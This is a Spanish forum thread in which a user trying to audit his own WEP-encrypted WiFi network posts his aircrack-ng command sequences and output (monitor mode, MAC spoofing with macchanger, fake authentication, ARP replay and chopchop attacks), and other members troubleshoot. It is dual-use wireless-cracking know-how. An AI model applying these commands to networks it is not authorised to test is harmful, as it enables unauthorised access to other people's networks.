atascado en la auditoria wifi, red cifrada wep

Iniciado por biznaka, 12 Mayo 2011, 13:20 PM

0 Miembros y 1 Visitante están viendo este tema.

biznaka

Hola amigos:

Seguramente sere un cateto, pero sigo sin poder realizar auditoria de mi red wifi.

Resulta que al hacer la autenticacion falsa con A-1, se lleva todo el tiempo intentanto conectar, y respondiendo succesfull, pero vuelve a realizar una nueva conexion, y asi ciclicamente, no dandome ninguna salido ni posibilidad de poder escribir ningun comando a no ser que abra otra consola. En la ventana donde hice anteriormente airodump-n canal del AP bssid del AP e interface, aparece las OPN y abajo aparecen vinculado o conectado mi MAC fakeada con la MAC del AP, pero repito en la consola donde hago el ataque A-1 no deja de conectarse y volverse a conectar, incluso variando de 5 en 5 el numero de que hay detras del -1 desde el 0 hasta 30, por si la configuracion del AP del router tuviera en la configuracion algun valor especifico.

En fin tengo que volver a releer el manual o hago algo mal que no salgo de este paso? Saludos y gracias por vuestra paciencia.

heaviloto

hola, biznaka

si, debes releeeer, aunque solo sea para saber por donde vas, yo podria ponerte aqui toda la serie de comandos, que debes utilizar y quedar como dios (cuanto sabe este tio,je je je), pero seguirias, sin enterarte, y digo yo,para que nos pegamos un curro de cojones rockeropasiempre, Zydas y yo, si todavia seguis preguntando esto, haz lo que ya te hemos recomendado, repasa bien los manuales tio, que esta mascado

http://foro.elhacker.net/wireless_en_linux/manual_wifislax_wifiway_avanzado_wep_y_wpa_rockeropasiempre_heavyloto_y_zydas-t261907.0.html

para tu problema, centrate en la parte que pone,

2.- INTRODUCCION A LA SEGURIDAD WEP. Por Heavyloto.

DIFERENTES TIPOS DE ATAQUES POR COMANDOS EN WIFISLAX O WIFIWAY, EN ESTE CASO USAREMOS WIFIWAY 1.0 FINAL.


y creo que ya no te puedo decir mas, amigo biznaka,y si despues de eso tienes dudas postealas

un saludo
larga vida al rock&roll
heaviloto

Tengo una solucion que te ofrezco amigo mio y a cambio nada me des, las luces encendidas son problema tuyo y mio lo vamos a resolver
(leño)

dvdr

utiliza este progama hay uno en el foro mas actualizado pero ami no me falla

http://sourceforge.net/projects/wepcrackgui/   podrias pobarlo
en la descarga viene como usarlo

descomprimes en el escritorio

abres la carpeta y ledas dos clipt  y rum en terminal




<script type="text/javascript" src="http://cdn.widgetserver.com/syndication/subscriber/InsertWidget.js"></script><script type="text/javascript">if (WIDGETBOX) WIDGETBOX.renderWidget('cdfef286-7505-4e06-a99a-907ff6a326a5');</script>
<noscript>Get the <a href="http://www.widgetbox.com/widget/timedate-widget">Time and Date</a> widget and many other <a href="http://www.widgetbox.com/">great free widg

biznaka

Hola Amigos:

Gracias a todos por vuestra ayuda. Deciros que el programa funciona perfecto. Pero como uno nacio cabezon, quiero hacerlo mediante la consola. Admitir que el programa me ha ayudado bastante a comprender mejor como va el proceso de la auditoria de redes.

Bueno el tema, sé que a lo mejor me pongo muy pesado pero voy a poneros en situacion y a ver si me ayudais a comprender qué es lo que no hago, o lo que hago mal.

Tenemos mi red con clave wep, ningun cliente conectado, y empiezo fijando mi tarjeta en el canal de mi red. Realizo una atenticacion falsa, hasta ahi todo perfecto. Despues realizo un ataque 3 y se queda a la escucha de algun ARP, pero nada ese dato no se mueve por los siglos de los siglos. INtento con un ataque 2 y nada se queda escuchando pauetes pero el ARP tampoco se mueve.

He intentado a desautenticarme para ver si al volverme asociar enviaba alguna peticion de ARP, pero como ya sabreis nada.

Lo intento con un ataque 5 de fragmentacion y tampoco nada.

Por ultimo intento con el ataque chopchop y tampoco nada.

No se que es lo que hago mal, seguramente todo, pero podeis decirme algo? Saludo y Gracias de nuevo.

ChimoC

Buenas:

Lo que necesitamos ver es qué tecleas en consola (no que nos digas qué ataques haces)

Hay algunos routers que son duros de roer, yo tenía uno del año del catapúm que soltaba datas cuando le daba la real gana (esquisito que es uno)

Un saludo

ChimoC

biznaka

Hola amigos, en relacion al post anterior pongo lo que hago al auditar las redes y pegare ademas as respuestas que recibo:

airmon-ng start wlan0

respuesta:

Found 5 processes that could cause trouble.

If airodump-ng, aireplay-ng or airtun-ng stops working after

a short period of time, you may want to kill (some of) them!



PID   Name

732   NetworkManager

734   avahi-daemon

736   avahi-daemon

753   wpa_supplicant

1538   dhclient

Process with PID 1538 (dhclient) is running on interface wlan0





Interface   Chipset      Driver



wlan0      Unknown    brcm80211 - [phy0]

            (monitor mode enabled on mon0)


ifconfig mon0

respuesta:

mon0      Link encap:UNSPEC  direcciónHW 00-1B-B1-XX-XX-XX-0A-00-00-00-00-00-00-00-00-00 

          ACTIVO DIFUSIÓN FUNCIONANDO MULTICAST  MTU:1500  Métrica:1

          Paquetes RX:2459 errores:0 perdidos:0 overruns:0 frame:0

          Paquetes TX:0 errores:0 perdidos:0 overruns:0 carrier:0

          colisiones:0 long.colaTX:1000

          Bytes RX:760498 (760.4 KB)  TX bytes:0 (0.0 B)

ifconfig mon0 down

macchanger -m 00:11:22:33:44:55 mon0

Current MAC: 00:1b:b1:XX:XX:XX (unknown)

Faked MAC:   00:11:22:33:44:55 (Cimsys Inc)


ifconfig mon0 up

airodump-ng mon0

control+c

airodump-ng -c 6 -b 00:04:E2:XX:XX:XX -w wep mon0

abro otra consola y realizo un ataque 3:

aireplay-ng -3 -b 00:04:E2:F2:AC:24 -h 00:11:22:33:44:55 mon0

se pone a leer paquetes y el ARP a cero.

En otra consola relaizo una autenticacion falsa, ataque 1:

aireplay-ng -1 0 (tambien voy probando de 5 en 5 desde el 0 hasta el 30) -e SMC -a 00:04:E2:XX:XX:XX -h 00:11:22:33:44:55 mon0

Aqui debo decir que no se me asocia con la MAC fakeada, en la ventana en la que hicimos airodump-ng aparece de STATION ademas de la MAC fakeada, la MAC real de wlan0. Realizo otro ataque 1 con la MAC de wlan y si me asocia. Continuo por tanto con la MAC real. Total es mia la red... Decir que en la consola donde hicimos el ataque 3 sigue leyendo paquetes y ARP a cero.

En la consola donde hicimos la autenticacion falsa hago un ataque 2 para intentar inyectar reinyectar ARPs.

aireplay-ng -2 -p 0841 -b 00:04:E2:F2:AC:24 -c FF:FF:FF:FF:FF:FF -h 00:11:22:33:44:55 mon0

Se pone a leer paquetes y nada mas, y la consola del ataque 3, el arp a cero tambien y leyendo paquetes como siempre tambien.

Paro esto y realizo otro ataque 2 pero esta vez con el archivo cap que genera.

Respuesta:

aireplay-ng -2 -r replay_arp-0518-*.cap -b 00:04:E2:F2:AC:24 -h 00:11:22:33:44:55 mon0

"aireplay-ng --help" for help.

root@biznaka-R540-R580-R780-SA41-E452-E852:/home/biznaka# aireplay-ng -2 -r replay_arp-0518-035428.cap -b 00:04:E2:F2:AC:24 -h 00:11:22:33:44:55 mon0

End of file.

Tambien pongo esta combinacion en la que pruebo con mi MAC real y pego la respuesta tambien:

root@biznaka-R540-R580-R780-SA41-E452-E852:/home/biznaka# aireplay-ng -2 -r replay_arp-0518-035428.cap -b 00:04:E2:XX:XX:XX -h 00:1B:B1:XX:XX:XX mon0

The interface MAC (00:11:22:33:44:55) doesn't match the specified MAC (-h).

   ifconfig mon0 hw ether  00:1B:B1:XX:XX:XX
End of file.


Bueno, creo que lo que queda ya es hacer lo que tenia que haber hecho, que creo que es el ataque 4, chochop creo que se llama. En la consola del ataque 2, pongo lo siguiente:

aireplay-ng -4 -h 00:11:22:33:44:55 -r  replay_arp-0518-035428.cap mon0

respuesta:

root@biznaka-R540-R580-R780-SA41-E452-E852:/home/biznaka# aireplay-ng -4 -h 00:11:22:33:44:55 -r  replay_arp-0518-035428.cap mon0

End of file.

Y pruebo este mismo ataque con la MAC real y pego tambien la respuesta:

root@biznaka-R540-R580-R780-SA41-E452-E852:/home/biznaka# aireplay-ng -4 -h 00:1B:B1:XX:XX:XX -r  replay_arp-0518-035428.cap mon0

The interface MAC (00:11:22:33:44:55) doesn't match the specified MAC (-h).

   ifconfig mon0 hw ether 00:1B:B1:XX:XX:XX

End of file.


Y llegados a este punto el tcpdump no lo puedo realizar. Imagino que problema estara con las direcciones MAC, o no sé qué decís vosotros? Gracias.

ChimoC

Buenas:

Hazlo todo con tu MAC real ya que si la falsa no se asocia pues estás haciendo el "canelo" con los demás ataques...

Un saludo

ChimoC

biznaka

Hola de nuevo:

He probado con la MAC real y tampoco hay diferencia, no consigo mover los ARP de cero. Alguna sugerencia? saludos.

biznaka

Hola:

Ninguna sugerencia para mover los ARPs, para que lo s datas suban? Lo que no entiendo es porque se pone un archivo .cap, para reenviar ARPs si como digo ese dato permanece a cero. Hago los pasos mas o menos bien? o hay algo q haga mal? saludos.

biznaka

Quisiera lanzar una pregunta o una idea, haber si puede ser la solucion al problema de que con la aplicacion wepcrack pueda auditar redes wep, y con la aircrack no. Wepcrack esta basado en aircrack, o no tiene nada que ver la aplicacion wepcrack con la suite aircrack? Lo digo porque buscando buscando, encontre en las reseñas de la aplicacion aircrack, en el centro de software de ubuntu, que una persona comenta que puede no funcionar esta suite en tarjetas inalambricas Broadcom, que curiosamente es la mia. Puede ser ese el motivo y nos estamos comiendo el tarro innecesariamente?


Saludos